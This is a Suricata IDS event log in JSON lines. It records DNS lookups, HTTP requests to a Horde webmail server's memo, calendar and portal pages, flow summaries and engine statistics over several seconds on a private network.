{"timestamp":"2020-02-29T00:12:34.602655+0000","flow_id":1661936193407531,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56201,"proto":"UDP","dns":{"type":"answer","id":39806,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:34.669166+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:12:34.669166+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":204,"tx_id":1}} {"timestamp":"2020-02-29T00:12:34.681377+0000","flow_id":964081317209505,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58854,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6800,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:34.789685+0000","flow_id":964081317209505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58854,"proto":"UDP","dns":{"type":"answer","id":6800,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:34.789685+0000","flow_id":964081317209505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58854,"proto":"UDP","dns":{"type":"answer","id":6800,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:34.913434+0000","flow_id":1937329496453146,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38808,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49577,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:34.923749+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5240}} {"timestamp":"2020-02-29T00:12:35.000171+0000","flow_id":563408108453862,"event_type":"flow","src_ip":"192.168.10.130","src_port":34794,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1095,"bytes_toclient":725,"start":"2020-02-29T00:11:22.851942+0000","end":"2020-02-29T00:11:34.022594+0000","age":12,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:35.000374+0000","flow_id":23852826892732,"event_type":"flow","src_ip":"192.168.10.122","src_port":43605,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:07:34.399804+0000","end":"2020-02-29T00:07:34.508268+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:35.000459+0000","flow_id":746339340518905,"event_type":"flow","src_ip":"192.168.10.122","src_port":54527,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:07:34.656889+0000","end":"2020-02-29T00:07:34.764835+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:35.022032+0000","flow_id":1937329496453146,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38808,"proto":"UDP","dns":{"type":"answer","id":49577,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:35.022032+0000","flow_id":1937329496453146,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38808,"proto":"UDP","dns":{"type":"answer","id":49577,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:35.103290+0000","flow_id":454818455014582,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34812,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4819}} {"timestamp":"2020-02-29T00:12:37.000149+0000","event_type":"stats","stats":{"uptime":14409,"capture":{"kernel_packets":134980,"kernel_drops":0},"decoder":{"pkts":134986,"bytes":93032192,"invalid":187,"ipv4":133495,"ipv6":8,"ethernet":134986,"raw":0,"null":0,"sll":0,"tcp":128217,"udp":5076,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2758,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2774,"synack":2765,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1798,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2318,"failed_udp":111},"tx":{"http":4628,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2398}},"flow_mgr":{"closed_pruned":2735,"new_pruned":15,"est_pruned":2363,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21823,"memcap_state":0,"memcap_global":0},"http":{"memuse":128024,"memcap":0}}} {"timestamp":"2020-02-29T00:12:38.000534+0000","flow_id":146057546899732,"event_type":"flow","src_ip":"192.168.10.130","src_port":34796,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1149,"bytes_toclient":7663,"start":"2020-02-29T00:11:31.729364+0000","end":"2020-02-29T00:11:37.019380+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:38.435589+0000","flow_id":2162338538366341,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38589,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54557,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:38.543962+0000","flow_id":2162338538366341,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38589,"proto":"UDP","dns":{"type":"answer","id":54557,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:38.543962+0000","flow_id":2162338538366341,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38589,"proto":"UDP","dns":{"type":"answer","id":54557,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:38.698958+0000","flow_id":931899127526949,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7922}} {"timestamp":"2020-02-29T00:12:39.885858+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34810,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5240},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":24332,"tx_id":2}} {"timestamp":"2020-02-29T00:12:40.104202+0000","flow_id":454818455014582,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34812,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4819},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":20386,"tx_id":0}} {"timestamp":"2020-02-29T00:12:41.000689+0000","flow_id":128482540935253,"event_type":"flow","src_ip":"192.168.10.130","src_port":34798,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1291,"bytes_toclient":8021,"start":"2020-02-29T00:11:34.022613+0000","end":"2020-02-29T00:11:40.125961+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:43.700464+0000","flow_id":931899127526949,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52732,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7922},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":44805,"tx_id":0}} {"timestamp":"2020-02-29T00:12:43.898656+0000","flow_id":1915120221140576,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34113,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54857,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:44.000246+0000","event_type":"stats","stats":{"uptime":14416,"capture":{"kernel_packets":135013,"kernel_drops":0},"decoder":{"pkts":135016,"bytes":93048265,"invalid":187,"ipv4":133525,"ipv6":8,"ethernet":135016,"raw":0,"null":0,"sll":0,"tcp":128245,"udp":5078,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2759,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2775,"synack":2766,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1800,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2319,"failed_udp":111},"tx":{"http":4629,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2399}},"flow_mgr":{"closed_pruned":2738,"new_pruned":15,"est_pruned":2365,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22411,"memcap_state":0,"memcap_global":0},"http":{"memuse":60014,"memcap":0}}} {"timestamp":"2020-02-29T00:12:44.002545+0000","flow_id":2246425387862493,"event_type":"flow","src_ip":"192.168.10.122","src_port":49223,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":173,"bytes_toclient":283,"start":"2020-02-29T00:07:30.133597+0000","end":"2020-02-29T00:07:43.926789+0000","age":13,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:44.006850+0000","flow_id":1915120221140576,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34113,"proto":"UDP","dns":{"type":"answer","id":54857,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:44.006850+0000","flow_id":1915120221140576,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34113,"proto":"UDP","dns":{"type":"answer","id":54857,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:44.001646+0000","flow_id":150206485572827,"event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958},"app_proto":"http","fileinfo":{"filename":"\/js\/ckeditor\/ckeditor_basic.js","state":"CLOSED","stored":false,"size":7141,"tx_id":6}} {"timestamp":"2020-02-29T00:12:44.330105+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24489}} {"timestamp":"2020-02-29T00:12:44.348475+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24489},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:12:44.351218+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451}} {"timestamp":"2020-02-29T00:12:44.353979+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470}} {"timestamp":"2020-02-29T00:12:44.398481+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":10823,"tx_id":1}} {"timestamp":"2020-02-29T00:12:44.407268+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046}} {"timestamp":"2020-02-29T00:12:44.410082+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046},"app_proto":"http","fileinfo":{"filename":"\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":10406,"tx_id":2}} {"timestamp":"2020-02-29T00:12:44.411619+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376}} {"timestamp":"2020-02-29T00:12:44.428156+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":24731,"tx_id":3}} {"timestamp":"2020-02-29T00:12:44.430971+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":47195},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/kronolith.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":4}} {"timestamp":"2020-02-29T00:12:44.449643+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":50590}} {"timestamp":"2020-02-29T00:12:44.451037+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":17678,"tx_id":0}} {"timestamp":"2020-02-29T00:12:44.451681+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688}} {"timestamp":"2020-02-29T00:12:44.454644+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/gnid3.wav","state":"CLOSED","stored":false,"size":13688,"tx_id":1}} {"timestamp":"2020-02-29T00:12:44.456844+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168}} {"timestamp":"2020-02-29T00:12:44.457400+0000","flow_id":618010033054210,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151}} {"timestamp":"2020-02-29T00:12:44.457725+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/doorbell.wav","state":"CLOSED","stored":false,"size":5168,"tx_id":5}} 